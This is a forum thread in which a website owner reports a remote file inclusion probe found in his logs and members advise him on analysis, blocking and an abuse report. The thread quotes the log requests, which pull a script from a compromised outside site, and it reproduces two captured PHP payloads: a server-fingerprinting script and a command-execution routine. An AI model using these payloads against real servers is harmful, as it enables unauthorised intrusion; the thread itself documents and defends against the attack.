Who's attacking the Wolfman?

Printable View

January 3rd, 2008, 05:31 AM
wolfman1984

Who's attacking the Wolfman?

The Wolfman was reviewing my server logs today when I came across this:

Code:

//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt?? Http Code: 404 Date: Jan 02 18:41:25 Http Version: HTTP/1.1 Size in Bytes: - Referer: - Agent: libwww-perl/5.808 67.15.175.50 /gbook//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt?? Http Code: 200 Date: Jan 02 18:44:32 Http Version: HTTP/1.1 Size in Bytes: 4290 Referer: - Agent: libwww-perl/5.808 67.15.175.50

It looks like someone has written a perl script that is testing my directories for the presence of an admin.php that is vulnerable to a parameter injection attack.

The second attempt actually found my gbook directory which is used by my Ghoulbook. I'm guessing the script spidered my site for admin.php. For all admin.php files discovered, it attempted the injection.

Here is the content of Goid.txt

Code:

<? echo "IndoServ "; $alb = @php_uname(); $alb2 = system(uptime); $alb3 = system(id); $alb4 = @getcwd(); $alb5 = getenv("SERVER_SOFTWARE"); $alb6 = phpversion(); $alb7 = $_SERVER['SERVER_NAME']; $alb8 = gethostbyname($SERVER_ADDR); $alb9 = get_current_user(); $os = @PHP_OS; echo "os: $os "; echo "uname -a: $alb "; echo "uptime: $alb2 "; echo "id: $alb3 "; echo "pwd: $alb4 "; echo "user: $alb9 "; echo "phpv: $alb6 "; echo "SoftWare: $alb5 "; echo "ServerName: $alb7 "; echo "ServerAddr: $alb8 "; echo "IndoServ IRC NetWork "; exit; ?>

It looks like Goid.txt is trying to display information about my server and my user account.

http://thermair.co.uk/ is an Air treatment company in the UK. They are probably unaware that there site is being used to harbour internet attacks against web servers.

A search of the source IP address 67.15.175.50 shows that others have also been attacked.

So here are my questions:

1) Has anyone seen this before?
2) Do you think the Wolfman should notify the Air Treatment company?

Thanks
January 3rd, 2008, 05:48 AM
wolfman1984

Here is another script being run against my server. I guess this is more popular then I first thought.

Code:

<?php echo "jimmywho"; $cmd="id"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; } exit;
January 3rd, 2008, 06:16 AM
phishphreek

Advanced Guest Book has been known to have vulnerabilities. The specific script they are running against you is a remote file inclusion where they attempt to execute commands on your server.

It's probably just someone scanning for web vulns. You can see it was a script by looking at the user agent. "libwww-per/5.808". As always, stay current on your updates and check your logs.
January 3rd, 2008, 07:16 AM
xiphias360

There's a handful of things it could be. But whatever the person is using, the intent is the same. By the looks of it, the person/bot is just doing recon. The next step is attack. You should definately whois the air company and inform the admin and keep an eye on your logs. I'd ban the IP from my server.

Also, online ip tracers are a very handy tool. If you enter that IP into one like http://visualiptrace.visualware.com, you'll see it traces back to Houston TX, and the ISP's number is 214-782-7802, and abuse contact is abuse@theplanet.com.

Save your logs. Paired with the google results, your next step should be to contact the ISP's abuse dept and have that problem handled right there. Make it clear you have evidence (logs+results) that this person is intentionally scanning for vulnerabilities and actively trying to exploit them, otherwise they may just brush you off as another paranoid user.
January 3rd, 2008, 09:07 AM
SirDice

When and if you do send an email to the abuse address. Don't put your analysis in there. Just the plain facts (relevant sections of your logs) as clear text in the body (no attachments). And don't use HTML email.

If you don't do it properly your abuse complaint may end up in the bitbucket.
January 3rd, 2008, 02:42 PM
t34b4g5

Quote:

Originally Posted by phishphreek

Advanced Guest Book has been known to have vulnerabilities. The specific script they are running against you is a remote file inclusion where they attempt to execute commands on your server.

It's probably just someone scanning for web vulns. You can see it was a script by looking at the user agent. "libwww-per/5.808". As always, stay current on your updates and check your logs.

I will 2nd this.

also do a whois on the IP as it is most likely a proxy. ;)
January 3rd, 2008, 08:23 PM
skiddieleet

I just ignore stuff like that. The only time you have to worry about it is if you're running the web application they're trying to exploit. I have fun collecting their remote include scripts though :)
January 3rd, 2008, 09:46 PM
xiphias360

^^ When it comes to your server's security, ignorance is not bliss.
January 4th, 2008, 05:04 AM
wolfman1984

Thanks everyone for the great advice. I've contacted the abuse team at theplanet.com, where the attack is coming from. Hopefully I will receive a response soon.